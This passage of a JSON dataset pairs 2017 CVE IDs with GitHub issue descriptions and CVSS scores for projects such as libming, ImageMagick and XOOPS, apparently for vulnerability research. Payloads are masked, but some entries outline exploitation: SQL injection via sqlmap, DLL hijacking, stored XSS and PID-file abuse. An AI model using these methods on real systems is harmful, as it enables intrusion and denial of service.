  6752. "Issue_Url_new": "https://github.com/jbeder/yaml-cpp/issues/519",
  6753. "Repo_new": "jbeder/yaml-cpp",
  6754. "Issue_Created_At": "2017-07-28T03:56:49Z",
  6755. "description": "The assert can lead to dos.. The assert code URLTAG can lead to a dos attack. Trigger: APITAG crash: APITAG",
  6756. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6757. "severity": "HIGH",
  6758. "baseScore": 7.5,
  6759. "impactScore": 3.6,
  6760. "exploitabilityScore": 3.9
  6761. },
  6762. {
  6763. "CVE_ID": "CVE-2017-11703",
  6764. "Issue_Url_old": "https://github.com/libming/libming/issues/72",
  6765. "Issue_Url_new": "https://github.com/libming/libming/issues/72",
  6766. "Repo_new": "libming/libming",
  6767. "Issue_Created_At": "2017-06-07T14:55:00Z",
  6768. "description": "memory leak in APITAG . On libming latest version, a memory leak was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6769. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6770. "severity": "MEDIUM",
  6771. "baseScore": 6.5,
  6772. "impactScore": 3.6,
  6773. "exploitabilityScore": 2.8
  6774. },
  6775. {
  6776. "CVE_ID": "CVE-2017-11704",
  6777. "Issue_Url_old": "https://github.com/libming/libming/issues/76",
  6778. "Issue_Url_new": "https://github.com/libming/libming/issues/76",
  6779. "Repo_new": "libming/libming",
  6780. "Issue_Created_At": "2017-06-08T16:27:53Z",
  6781. "description": "heap buffer overflow in APITAG On libming latest version, a heap buffer overflow was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6782. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6783. "severity": "MEDIUM",
  6784. "baseScore": 6.5,
  6785. "impactScore": 3.6,
  6786. "exploitabilityScore": 2.8
  6787. },
  6788. {
  6789. "CVE_ID": "CVE-2017-11705",
  6790. "Issue_Url_old": "https://github.com/libming/libming/issues/71",
  6791. "Issue_Url_new": "https://github.com/libming/libming/issues/71",
  6792. "Repo_new": "libming/libming",
  6793. "Issue_Created_At": "2017-06-07T14:54:04Z",
  6794. "description": "memory leak in APITAG On libming latest version, a memory leak was found in function APITAG CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6795. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6796. "severity": "MEDIUM",
  6797. "baseScore": 6.5,
  6798. "impactScore": 3.6,
  6799. "exploitabilityScore": 2.8
  6800. },
  6801. {
  6802. "CVE_ID": "CVE-2017-11723",
  6803. "Issue_Url_old": "https://github.com/JojoCMS/Jojo-CMS/issues/30",
  6804. "Issue_Url_new": "https://github.com/jojocms/jojo-cms/issues/30",
  6805. "Repo_new": "jojocms/jojo-cms",
  6806. "Issue_Created_At": "2017-07-27T08:02:21Z",
  6807. "description": "a path traversal vuln in jojocms . there is a path traversal vuln that can delete any folder on the server, and it can be done by an unauthorized remote attacker Code PATHTAG line NUMBERTAG ERRORTAG the parameter $_GET FILETAG after the post FILETAG",
  6808. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6809. "severity": "HIGH",
  6810. "baseScore": 7.5,
  6811. "impactScore": 3.6,
  6812. "exploitabilityScore": 3.9
  6813. },
  6814. {
  6815. "CVE_ID": "CVE-2017-11724",
  6816. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/624",
  6817. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/624",
  6818. "Repo_new": "imagemagick/imagemagick",
  6819. "Issue_Created_At": "2017-07-27T15:07:41Z",
  6820. "description": "Memory Leak in APITAG NUMBERTAG APITAG Memory Leak File Link : FILETAG Trigger Command : ./convert Memory Leak APITAG FILETAG Leak Detail : PATHTAG ./convert Memory Leak APITAG FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG e NUMBERTAG a ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ed0 ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG ac ( PATHTAG NUMBERTAG f NUMBERTAG c3a NUMBERTAG d ( PATHTAG NUMBERTAG f NUMBERTAG c3b NUMBERTAG a NUMBERTAG PATHTAG )",
  6821. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6822. "severity": "MEDIUM",
  6823. "baseScore": 6.5,
  6824. "impactScore": 3.6,
  6825. "exploitabilityScore": 2.8
  6826. },
  6827. {
  6828. "CVE_ID": "CVE-2017-11728",
  6829. "Issue_Url_old": "https://github.com/libming/libming/issues/82",
  6830. "Issue_Url_new": "https://github.com/libming/libming/issues/82",
  6831. "Repo_new": "libming/libming",
  6832. "Issue_Created_At": "2017-06-08T16:35:58Z",
  6833. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6834. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6835. "severity": "MEDIUM",
  6836. "baseScore": 5.5,
  6837. "impactScore": 3.6,
  6838. "exploitabilityScore": 1.8
  6839. },
  6840. {
  6841. "CVE_ID": "CVE-2017-11729",
  6842. "Issue_Url_old": "https://github.com/libming/libming/issues/79",
  6843. "Issue_Url_new": "https://github.com/libming/libming/issues/79",
  6844. "Repo_new": "libming/libming",
  6845. "Issue_Created_At": "2017-06-08T16:32:14Z",
  6846. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6847. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6848. "severity": "MEDIUM",
  6849. "baseScore": 5.5,
  6850. "impactScore": 3.6,
  6851. "exploitabilityScore": 1.8
  6852. },
  6853. {
  6854. "CVE_ID": "CVE-2017-11730",
  6855. "Issue_Url_old": "https://github.com/libming/libming/issues/81",
  6856. "Issue_Url_new": "https://github.com/libming/libming/issues/81",
  6857. "Repo_new": "libming/libming",
  6858. "Issue_Created_At": "2017-06-08T16:34:13Z",
  6859. "description": "heap buffer overflow in APITAG (via APITAG On libming latest version, a heap buffer overflow was found in function APITAG . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6860. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6861. "severity": "MEDIUM",
  6862. "baseScore": 5.5,
  6863. "impactScore": 3.6,
  6864. "exploitabilityScore": 1.8
  6865. },
  6866. {
  6867. "CVE_ID": "CVE-2017-11731",
  6868. "Issue_Url_old": "https://github.com/libming/libming/issues/84",
  6869. "Issue_Url_new": "https://github.com/libming/libming/issues/84",
  6870. "Repo_new": "libming/libming",
  6871. "Issue_Created_At": "2017-06-08T16:37:37Z",
  6872. "description": "invalid memory read in APITAG . On libming latest version, an invalid memory read was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6873. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6874. "severity": "MEDIUM",
  6875. "baseScore": 5.5,
  6876. "impactScore": 3.6,
  6877. "exploitabilityScore": 1.8
  6878. },
  6879. {
  6880. "CVE_ID": "CVE-2017-11732",
  6881. "Issue_Url_old": "https://github.com/libming/libming/issues/80",
  6882. "Issue_Url_new": "https://github.com/libming/libming/issues/80",
  6883. "Repo_new": "libming/libming",
  6884. "Issue_Created_At": "2017-06-08T16:33:06Z",
  6885. "description": "heap buffer overflow in dcputs . On libming latest version, a heap buffer overflow was found in function dcputs . CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6886. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6887. "severity": "MEDIUM",
  6888. "baseScore": 5.5,
  6889. "impactScore": 3.6,
  6890. "exploitabilityScore": 1.8
  6891. },
  6892. {
  6893. "CVE_ID": "CVE-2017-11733",
  6894. "Issue_Url_old": "https://github.com/libming/libming/issues/78",
  6895. "Issue_Url_new": "https://github.com/libming/libming/issues/78",
  6896. "Repo_new": "libming/libming",
  6897. "Issue_Created_At": "2017-06-08T16:30:19Z",
  6898. "description": "null pointer dereference in stackswap . On libming latest version, a null pointer dereference was found in function stackswap . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6899. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6900. "severity": "MEDIUM",
  6901. "baseScore": 5.5,
  6902. "impactScore": 3.6,
  6903. "exploitabilityScore": 1.8
  6904. },
  6905. {
  6906. "CVE_ID": "CVE-2017-11734",
  6907. "Issue_Url_old": "https://github.com/libming/libming/issues/83",
  6908. "Issue_Url_new": "https://github.com/libming/libming/issues/83",
  6909. "Repo_new": "libming/libming",
  6910. "Issue_Created_At": "2017-06-08T16:36:52Z",
  6911. "description": "heap buffer overflow in APITAG . On libming latest version, a heap buffer overflow was found in function APITAG . ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  6912. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6913. "severity": "MEDIUM",
  6914. "baseScore": 5.5,
  6915. "impactScore": 3.6,
  6916. "exploitabilityScore": 1.8
  6917. },
  6918. {
  6919. "CVE_ID": "CVE-2017-11736",
  6920. "Issue_Url_old": "https://github.com/bigtreecms/BigTree-CMS/issues/304",
  6921. "Issue_Url_new": "https://github.com/bigtreecms/bigtree-cms/issues/304",
  6922. "Repo_new": "bigtreecms/bigtree-cms",
  6923. "Issue_Created_At": "2017-07-29T07:51:29Z",
  6924. "description": "SQL injection in bigtreecms NUMBERTAG SQL injection in bigtreecms NUMBERTAG Needs an account of normal user with edit module permissions. in PATHTAG get tags parameter: APITAG call APITAG or APITAG with tags: APITAG in APITAG or APITAG CODETAG call APITAG without APITAG the tag parameter. cause sql injection to exploit NUMBERTAG login with edit module permissions NUMBERTAG get the post request of edit module. APITAG NUMBERTAG send it to sqlmap tool FILETAG",
  6925. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6926. "severity": "HIGH",
  6927. "baseScore": 8.8,
  6928. "impactScore": 5.9,
  6929. "exploitabilityScore": 2.8
  6930. },
  6931. {
  6932. "CVE_ID": "CVE-2017-11737",
  6933. "Issue_Url_old": "https://github.com/vstakhov/rspamd/issues/1738",
  6934. "Issue_Url_new": "https://github.com/rspamd/rspamd/issues/1738",
  6935. "Repo_new": "rspamd/rspamd",
  6936. "Issue_Created_At": "2017-07-08T20:15:01Z",
  6937. "description": "APITAG js executed in history page. Classification APITAG choose one option): [ ] PATHTAG loss [x] APITAG [ ] Serious bug [ ] Other bug [ ] Feature [ ] Enhancement Reproducibility APITAG choose one option): [X] Always [ ] Sometimes [ ] Rarely [ ] Unable [ ] I didn\u2019t try [ ] Not applicable Rspamd version NUMBERTAG Operating system, CPU, memory and environment: Description APITAG provide a descriptive summary of the issue): It seems that the webui does not handle subjects correctly and executes javascript. Maybe other columns are affected also. Compile errors (if any): Steps to reproduce: Send mail with APITAG in subject. Expected results: Show subject Actual results: Alertbox pops up, no subjects shown Debugging information (see details [here URLTAG : Configuration: Additional information:",
  6938. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6939. "severity": "MEDIUM",
  6940. "baseScore": 6.1,
  6941. "impactScore": 2.7,
  6942. "exploitabilityScore": 2.8
  6943. },
  6944. {
  6945. "CVE_ID": "CVE-2017-11742",
  6946. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/82",
  6947. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/82",
  6948. "Repo_new": "libexpat/libexpat",
  6949. "Issue_Created_At": "2017-07-14T20:08:55Z",
  6950. "description": "Windows APITAG DLL hijacking vulnerability. Starting with NUMBERTAG libexpat added a APITAG call to load the APITAG Windows system DLL to improve random numbers. This call however is prone to a known FILETAG , with no (trivial) way to opt out from this by apps making use of libexpat. The attack works by building a tailor made APITAG that exports the function required and called by libexpat, and copying that DLL to the directory of the user application or to the current directory. My (already proposed in URLTAG patch is this: CODETAG It will resolve the problem for Windows Vista and newer versions, thus covering all officially supported Windows versions. For older versions the generally recommended method is to detect APITAG directory and prepend that to the loaded DLL name.",
  6951. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6952. "severity": "HIGH",
  6953. "baseScore": 7.8,
  6954. "impactScore": 5.9,
  6955. "exploitabilityScore": 1.8
  6956. },
  6957. {
  6958. "CVE_ID": "CVE-2017-11744",
  6959. "Issue_Url_old": "https://github.com/modxcms/revolution/issues/13564",
  6960. "Issue_Url_new": "https://github.com/modxcms/revolution/issues/13564",
  6961. "Repo_new": "modxcms/revolution",
  6962. "Issue_Created_At": "2017-07-30T12:15:21Z",
  6963. "description": "Stored XSS in MOD NUMBERTAG System Settings module. Summary I found two stored XSS in MOD NUMBERTAG System Settings APITAG \"key\" and \"name\" parameters in the following request are vulnerable to XSS vulnerability. This malicious payload will be triggered by every user, when they visit this module. Steps to reproduce Example request, which creates new setting with malicious $key and malicious $name: CODETAG Observed behavior A small popup will come up. APITAG FILETAG Environment MOD NUMBERTAG apache NUMBERTAG mysql NUMBERTAG php NUMBERTAG",
  6964. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  6965. "severity": "MEDIUM",
  6966. "baseScore": 6.1,
  6967. "impactScore": 2.7,
  6968. "exploitabilityScore": 2.8
  6969. },
  6970. {
  6971. "CVE_ID": "CVE-2017-11746",
  6972. "Issue_Url_old": "https://github.com/inversepath/tenshi/issues/6",
  6973. "Issue_Url_new": "https://github.com/f-secure-foundry/tenshi/issues/6",
  6974. "Repo_new": "f-secure-foundry/tenshi",
  6975. "Issue_Created_At": "2017-07-28T19:00:39Z",
  6976. "description": "Tenshi should create its PID file before dropping privileges. As part of the recent APITAG init script changes, I found the following vulnerability regarding signal handling. Basically, tenshi should create its PID file before it drops privileges to a restricted user (say, the _tenshi_ user). Why? Well, imagine what you might like to do with the PID of the tenshi process: send a signal to the daemon! But if the PID file is created as the _tenshi_ user, then the _tenshi_ user can replace what's in the PID file with e.g. APITAG . Now, any attempt to stop tenshi will instead stop PID NUMBERTAG and reboot the system. To prevent that, the PID file should be created as root. After this change is made, I'll need to fix the init script once more to make sure that the restricted user can't write to the _directory_ containing its PID file (for the same reasons). From a quick glance, it looks like the other init scripts have the same problem.",
  6977. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6978. "severity": "HIGH",
  6979. "baseScore": 7.5,
  6980. "impactScore": 3.6,
  6981. "exploitabilityScore": 3.9
  6982. },
  6983. {
  6984. "CVE_ID": "CVE-2017-11747",
  6985. "Issue_Url_old": "https://github.com/tinyproxy/tinyproxy/issues/106",
  6986. "Issue_Url_new": "https://github.com/tinyproxy/tinyproxy/issues/106",
  6987. "Repo_new": "tinyproxy/tinyproxy",
  6988. "Issue_Created_At": "2017-07-28T21:25:54Z",
  6989. "description": "tinyproxy should create its PID file before dropping privileges. Summary The tinyproxy daemon should create its PID file before dropping privileges. This represents a minor security issue; additional factors are needed to make it exploitable. Description The purpose of the PID file is to hold the PID of the running daemon, so that later it can be stopped, restarted, or otherwise signalled (many daemons reload their configurations in response to a SIGHUP). To fulfill that purpose, the contents of the PID file need to be trustworthy. If the PID file is writable by a non root user, then he can replace its contents with the PID of a root process. Afterwards, any attempt to signal the PID contained in the PID file will instead signal a root process chosen by the non root user (a vulnerability). This is commonly exploitable by init scripts that are run as root and which blindly trust the contents of their PID files. If one daemon flushes its cache in response to SIGUSR2 and another daemon drops all connections in response to SIGUSR2, it is not hard to imagine a denial of service by the user of the first daemon against the second. Exploitation There is only a risk of exploitation when some other user relies on the data in the PID file. But you have to wonder, what's the point of the PID file if not to provide the PID to other people? Any situation where the PID file is used is therefore suspicious.",
  6990. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  6991. "severity": "MEDIUM",
  6992. "baseScore": 5.5,
  6993. "impactScore": 3.6,
  6994. "exploitabilityScore": 1.8
  6995. },
  6996. {
  6997. "CVE_ID": "CVE-2017-11750",
  6998. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/632",
  6999. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/632",
  7000. "Repo_new": "imagemagick/imagemagick",
  7001. "Issue_Created_At": "2017-07-30T07:34:09Z",
  7002. "description": "Null pointer Dereference in APITAG APITAG URL: FILETAG Version: APITAG NUMBERTAG Q NUMBERTAG Trigger Command: ./magick convert SEGV APITAG output.aai Crash Detail: ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG f1fd0f1cde7 bp NUMBERTAG ffdf NUMBERTAG ad5c0 sp NUMBERTAG ffdf NUMBERTAG ad NUMBERTAG T NUMBERTAG f1fd0f1cde6 in APITAG APITAG NUMBERTAG f1fd0f1f NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0f NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG cc in APITAG APITAG NUMBERTAG f1fd0a NUMBERTAG ed in APITAG APITAG NUMBERTAG f1fd NUMBERTAG de in APITAG APITAG NUMBERTAG f1fd NUMBERTAG bae in APITAG APITAG NUMBERTAG e9 in APITAG APITAG NUMBERTAG f1fcfcdba3f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info.",
  7003. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7004. "severity": "MEDIUM",
  7005. "baseScore": 6.5,
  7006. "impactScore": 3.6,
  7007. "exploitabilityScore": 2.8
  7008. },
  7009. {
  7010. "CVE_ID": "CVE-2017-11751",
  7011. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/631",
  7012. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/631",
  7013. "Repo_new": "imagemagick/imagemagick",
  7014. "Issue_Created_At": "2017-07-30T07:13:53Z",
  7015. "description": "Memory Leak in APITAG APITAG URL: FILETAG Trigger Command: ./magick convert Memory Leak NUMBERTAG output_picon NUMBERTAG APITAG APITAG NUMBERTAG Q NUMBERTAG Crash Detail: APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG d5a9aa in malloc ( PATHTAG NUMBERTAG f NUMBERTAG d5cb5 in APITAG APITAG",
  7016. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7017. "severity": "MEDIUM",
  7018. "baseScore": 6.5,
  7019. "impactScore": 3.6,
  7020. "exploitabilityScore": 2.8
  7021. },
  7022. {
  7023. "CVE_ID": "CVE-2017-11752",
  7024. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/628",
  7025. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/628",
  7026. "Repo_new": "imagemagick/imagemagick",
  7027. "Issue_Created_At": "2017-07-29T11:29:45Z",
  7028. "description": "Memory Leak in in APITAG APITAG Poc link : URLTAG Trigger Command\uff1a APITAG ERRORTAG",
  7029. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7030. "severity": "MEDIUM",
  7031. "baseScore": 6.5,
  7032. "impactScore": 3.6,
  7033. "exploitabilityScore": 2.8
  7034. },
  7035. {
  7036. "CVE_ID": "CVE-2017-11753",
  7037. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/629",
  7038. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/629",
  7039. "Repo_new": "imagemagick/imagemagick",
  7040. "Issue_Created_At": "2017-07-29T12:09:40Z",
  7041. "description": "Heap buffer overflow in APITAG APITAG Poc link: FILETAG Trigger Command\uff1a APITAG APITAG output: ERRORTAG",
  7042. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7043. "severity": "MEDIUM",
  7044. "baseScore": 6.5,
  7045. "impactScore": 3.6,
  7046. "exploitabilityScore": 2.8
  7047. },
  7048. {
  7049. "CVE_ID": "CVE-2017-11754",
  7050. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/633",
  7051. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/633",
  7052. "Repo_new": "imagemagick/imagemagick",
  7053. "Issue_Created_At": "2017-07-30T11:13:07Z",
  7054. "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG ERRORTAG",
  7055. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7056. "severity": "MEDIUM",
  7057. "baseScore": 6.5,
  7058. "impactScore": 3.6,
  7059. "exploitabilityScore": 2.8
  7060. },
  7061. {
  7062. "CVE_ID": "CVE-2017-11755",
  7063. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/634",
  7064. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/634",
  7065. "Repo_new": "imagemagick/imagemagick",
  7066. "Issue_Created_At": "2017-07-30T11:17:53Z",
  7067. "description": "Memory Leak in APITAG APITAG Poc link : FILETAG Trigger Command\uff1a APITAG CODETAG",
  7068. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7069. "severity": "MEDIUM",
  7070. "baseScore": 6.5,
  7071. "impactScore": 3.6,
  7072. "exploitabilityScore": 2.8
  7073. },
  7074. {
  7075. "CVE_ID": "CVE-2017-12065",
  7076. "Issue_Url_old": "https://github.com/Cacti/cacti/issues/877",
  7077. "Issue_Url_new": "https://github.com/cacti/cacti/issues/877",
  7078. "Repo_new": "cacti/cacti",
  7079. "Issue_Created_At": "2017-07-26T07:53:03Z",
  7080. "description": "some vulns found in.",
  7081. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  7082. "severity": "CRITICAL",
  7083. "baseScore": 9.8,
  7084. "impactScore": 5.9,
  7085. "exploitabilityScore": 3.9
  7086. },
  7087. {
  7088. "CVE_ID": "CVE-2017-12138",
  7089. "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/523",
  7090. "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/523",
  7091. "Repo_new": "xoops/xoopscore25",
  7092. "Issue_Created_At": "2017-07-18T15:08:59Z",
  7093. "description": "url redirect vulnerability in xoops NUMBERTAG There is a url redirect vulnerability in PATHTAG line NUMBERTAG FILETAG When xoops_redirect is not a full https url, the defence will be bypassed. POC: FILETAG This will cause to redirect to yahoo as follow: FILETAG Discoverer: APITAG of Venustech",
  7094. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7095. "severity": "MEDIUM",
  7096. "baseScore": 6.1,
  7097. "impactScore": 2.7,
  7098. "exploitabilityScore": 2.8
  7099. },
  7100. {
  7101. "CVE_ID": "CVE-2017-12139",
  7102. "Issue_Url_old": "https://github.com/XOOPS/XoopsCore25/issues/524",
  7103. "Issue_Url_new": "https://github.com/xoops/xoopscore25/issues/524",
  7104. "Repo_new": "xoops/xoopscore25",
  7105. "Issue_Created_At": "2017-07-18T15:19:15Z",
  7106. "description": "stored xss in XOOPS NUMBERTAG There is a stored xss in FILETAG . Here is the critical code: FILETAG After the file is uploaded, some information about the file will be written to the database. image_mimetype with value from $uploader APITAG will be written . FILETAG $uploader APITAG is finally from the",
  7107. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  7108. "severity": "MEDIUM",
  7109. "baseScore": 6.1,
  7110. "impactScore": 2.7,
  7111. "exploitabilityScore": 2.8
  7112. },
  7113. {
  7114. "CVE_ID": "CVE-2017-12140",
  7115. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/533",
  7116. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/533",
  7117. "Repo_new": "imagemagick/imagemagick",
  7118. "Issue_Created_At": "2017-06-29T14:36:38Z",
  7119. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DCM file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG length can be controlled as follow: ERRORTAG datum is int which is NUMBERTAG bit and signed type, quantum is size_t which is NUMBERTAG bit and unsigned type. datum is from file data, it can be controlled, so the datum value can be set to NUMBERTAG quantum value is a constant as it just can be PATHTAG So if datum is a negative number, it will be converted to an unsigned NUMBERTAG bit which is very large. So length can be controlled to be very large to cause memory exhaustion . testcase: URLTAG Credit: APITAG of Venustech",
  7120. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7121. "severity": "MEDIUM",
  7122. "baseScore": 6.5,
  7123. "impactScore": 3.6,
  7124. "exploitabilityScore": 2.8
  7125. },
  7126. {
  7127. "CVE_ID": "CVE-2017-12141",
  7128. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/50",
  7129. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/50",
  7130. "Repo_new": "yeraze/ytnef",
  7131. "Issue_Created_At": "2017-06-08T14:15:18Z",
  7132. "description": "heap buffer overflow in APITAG APITAG ). On Yerase TNEF Printer NUMBERTAG a heap buffer overflow was found in the function APITAG APITAG ). CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  7133. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7134. "severity": "MEDIUM",
  7135. "baseScore": 5.5,
  7136. "impactScore": 3.6,
  7137. "exploitabilityScore": 1.8
  7138. },
  7139. {
  7140. "CVE_ID": "CVE-2017-12142",
  7141. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/49",
  7142. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/49",
  7143. "Repo_new": "yeraze/ytnef",
  7144. "Issue_Created_At": "2017-06-08T14:13:52Z",
  7145. "description": "invalid memory read in APITAG On Yerase TNEF Printer NUMBERTAG an invalid memory read was found in the function APITAG ERRORTAG testcase: URLTAG Credit : APITAG of Venustech",
  7146. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7147. "severity": "MEDIUM",
  7148. "baseScore": 5.5,
  7149. "impactScore": 3.6,
  7150. "exploitabilityScore": 1.8
  7151. },
  7152. {
  7153. "CVE_ID": "CVE-2017-12144",
  7154. "Issue_Url_old": "https://github.com/Yeraze/ytnef/issues/51",
  7155. "Issue_Url_new": "https://github.com/yeraze/ytnef/issues/51",
  7156. "Repo_new": "yeraze/ytnef",
  7157. "Issue_Created_At": "2017-06-08T14:16:49Z",
  7158. "description": "allocation failed in APITAG On Yerase TNEF Printer NUMBERTAG an allocation failure was found in the function APITAG APITAG ). ERRORTAG testcase : URLTAG Credit : APITAG of Venustech",
  7159. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  7160. "severity": "MEDIUM",
  7161. "baseScore": 5.5,
  7162. "impactScore": 3.6,
  7163. "exploitabilityScore": 1.8
  7164. },
  7165. {
  7166. "CVE_ID": "CVE-2017-12412",
  7167. "Issue_Url_old": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
  7168. "Issue_Url_new": "https://github.com/cn-uofbasel/ccn-lite/issues/128",
  7169. "Repo_new": "cn-uofbasel/ccn-lite",
  7170. "Issue_Created_At": "2017-08-03T11:59:26Z",
  7171. "description": "FILETAG",
  7172. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  7173. "severity": "HIGH",
  7174. "baseScore": 7.8,
  7175. "impactScore": 5.9,
  7176. "exploitabilityScore": 1.8
  7177. },
  7178. {
  7179. "CVE_ID": "CVE-2017-12418",
  7180. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/643",
  7181. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/643",
  7182. "Repo_new": "imagemagick/imagemagick",
  7183. "Issue_Created_At": "2017-08-02T12:50:16Z",
  7184. "description": "Memory leak in APITAG APITAG Link : FILETAG Trigger Command : ./magick convert Memory Leak NUMBERTAG output_fp NUMBERTAG output.fpx Detail: ERRORTAG",
  7185. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  7186. "severity": "HIGH",
